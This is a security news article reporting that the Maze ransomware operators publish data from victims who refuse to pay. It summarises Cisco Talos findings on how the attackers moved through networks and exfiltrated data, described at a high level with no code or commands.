As if having their data encrypted wasn’t bad enough, businesses that fell victim to Maze ransomware now face another threat: their data could become public.
For a while, Maze’s operators have been harvesting data from the victim organizations, to eventually use it as leverage if payment to decrypt files is not received. Now, they threaten to release the data for all those victims who refuse to pay the ransom.
In this regard, the threat actor came up with a website where they list the names and websites of eight companies that allegedly refused to pay the demanded amount to recover their data.
According to security journalist Brian Krebs, at least one of the companies on that list was indeed targeted with Maze ransomware, although the incident did not make headlines.
On said website, the Maze operators publish data such as initial date of infection, some stolen documents (Office, text and PDF files), the total volume of data supposedly harvested from the organization, and the IP addresses and machine names of the infected servers.
The move is not surprising, especially since the individuals behind Maze have been engaged in exfiltrating victim data for a while now, and have also been threatening to out that information publicly if the victim does not pay the requested ransom.
In one incident where the Maze ransomware was deployed, the attackers first leveraged Cobalt Strike after gaining access to the network, to gather data on the victim environment and move laterally. A technique commonly associated with Russian threat actor Cozy Bear was also employed.
Next, the hackers started exfiltrating data using PowerShell to connect to a remote FTP server. Only after this step was completed they deployed Maze ransomware to encrypt the victim’s files.
In another incident, which Cisco Talos attributes to the same actor, Cobalt Strike was used again after the initial compromise, and PowerShell was employed to dump large amounts of data via FTP. The attackers then demanded payment before making the information public.
The two incidents are connected mainly through the employed command and control (C&C) infrastructure — the data was dumped to the same server as in the previously mentioned incident — the use of 7-Zip to compress the harvested data, interactive logins via Windows Remote Desktop Protocol, and remote PowerShell execution.
“The use of targeted ransomware attacks isn’t new and, unfortunately, it’s not going anywhere anytime soon. This is an extremely lucrative attack avenue for adversaries and as such, its popularity is likely only going to increase. What makes these particular attacks interesting is the additional monetization avenue of exfiltrating data in the process,” Talos points out.
With this data in hand, the threat actor can demand more money from the victim, or could monetize it by selling it on dark web markets to other cybercriminals. Not to mention that organizations may pay up to avoid the damage caused by the release of their data.
“This trend of achieving maximum monetary gain for their nefarious activities is increasingly common in the crimeware space […]. Expect adversaries to be increasingly aware of the systems and networks they are compromising as all systems and networks are not created equally and some have much higher profit margins, when compromised,” Talos concludes.

More from Ionut Arghire
- Nigerian BEC Scammer Sentenced to Prison in US
- China’s Nuclear Energy Sector Targeted in Cyberespionage Campaign
- 14 Million Records Stolen in Data Breach at Latitude Financial Services
- iOS Security Update Patches Exploited Vulnerability in Older iPhones
- Hackers Earn Over $1 Million at Pwn2Own Exploit Contest
- GoAnywhere Zero-Day Attack Hits Major Orgs
- Australia Dismantles BEC Group That Laundered $1.7 Million
- GitHub Rotates Publicly Exposed RSA SSH Private Key
Latest News
- Mandiant Catches Another North Korean Gov Hacker Group
- Microsoft Puts ChatGPT to Work on Automating Cybersecurity
- Video: How to Build Resilience Against Emerging Cyber Threats
- Nigerian BEC Scammer Sentenced to Prison in US
- China’s Nuclear Energy Sector Targeted in Cyberespionage Campaign
- SecurityScorecard Guarantees Accuracy of Its Security Ratings
- ChatGPT Data Breach Confirmed as Security Firm Warns of Vulnerable Component Exploitation
- 14 Million Records Stolen in Data Breach at Latitude Financial Services
